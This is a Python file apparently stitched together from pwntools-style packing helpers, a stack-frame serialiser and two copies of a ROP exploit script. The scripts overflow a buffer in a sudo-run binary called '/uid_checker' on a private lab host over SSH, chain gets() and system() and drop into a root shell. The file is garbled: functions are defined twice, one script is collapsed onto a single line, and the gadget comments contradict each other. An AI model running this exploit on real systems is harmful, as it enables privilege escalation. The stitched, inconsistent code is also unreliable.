def __str__(self, count=1):
    """Serialise this frame as raw bytes.

    If ``self.rbp`` is exactly ``0`` it is first replaced by ``count``; that
    assignment is kept on the object after the call.  ``p64`` and the
    attributes ``addr``/``target``/``edi``/``rsi``/``rdx`` come from the
    enclosing class/module, which is not visible here.
    """
    if self.rbp == 0:
        self.rbp = count
    # Same word order as the original concatenation chain.
    words = [
        self.addr,
        0,
        self.rbp,
        self.target,
        self.edi,
        self.rsi,
        self.rdx,
        self.addr - 0x1a,
    ]
    return b"".join(p64(word) for word in words)
def p64(self, *a, **kw):
    """Pack the arguments with ``packing.p64`` and send the result.

    All positional and keyword arguments are forwarded to ``packing.p64``;
    the return value is whatever ``self.send`` returns.
    """
    packed = packing.p64(*a, **kw)
    return self.send(packed)
def p64(self, address, data, *a, **kw):
    """Write ``data`` packed as a 64-bit value (``packing.p64``) at ``address``.

    Extra positional/keyword arguments are forwarded to ``packing.p64``;
    returns whatever ``self.write`` returns.
    """
    packed = packing.p64(data, *a, **kw)
    return self.write(address, packed)

def p32(self, address, data, *a, **kw):
    """Write ``data`` packed as a 32-bit value (``packing.p32``) at ``address``.

    Extra positional/keyword arguments are forwarded to ``packing.p32``;
    returns whatever ``self.write`` returns.
    """
    packed = packing.p32(data, *a, **kw)
    return self.write(address, packed)
def p64(self, address, data, *a, **kw):
    """Write ``data`` packed as a 64-bit value (``packing.p64``) at ``address``.

    Extra positional/keyword arguments are forwarded to ``packing.p64``;
    returns whatever ``self.write`` returns.
    """
    packed = packing.p64(data, *a, **kw)
    return self.write(address, packed)
#!/usr/bin/env python3 from pwn import cyclic from pwnlib.tubes.ssh import ssh from pwnlib.util.packing import p64 offset = 88 payload = cyclic(offset) payload += p64(0x400803) # pop rdi; ret payload += p64(0x601060) # [arg0] rdi = 6295648 payload += p64(0x4005b0) payload += p64(0x400803) # pop rdi; ret payload += p64(0x601060) # [arg0] rdi = 6295648 payload += p64(0x400570) s = ssh(host='10.10.139.182', user='******') p = s.process(['sudo', '/uid_checker']) print(p.recv()) p.sendline(payload) print(p.recv()) p.sendline("/bin/sh") p.interactive()
from pwn import cyclic
from pwnlib.tubes.ssh import ssh
from pwnlib.util.packing import p64

# The offset and every address below are hard-coded for one specific binary;
# nothing in this script checks them against the target.  Note the gadget
# comments here ("pop r15; ret") differ from the sibling script's
# ("pop rdi; ret") for the same address 0x400803 — one of the two is wrong.
offset = 88 # Found with ropstar
payload = cyclic(offset)
payload += p64(0x400803) # pop r15; ret
payload += p64(0x601060) # .bss
payload += p64(0x4005b0) # gets()
payload += p64(0x400803) # pop r15; ret
payload += p64(0x601060) # .bss
payload += p64(0x400570) # system()

# Remote session: host, user (redacted in the source) and key file are
# hard-coded.
s = ssh(host='10.10.202.250', user='******', keyfile='./id_rsa')
p = s.process(['sudo', '/uid_checker'])
print(p.recv())
p.sendline(payload)
print(p.recv())
p.sendline("/bin/sh")
p.interactive(prompt='')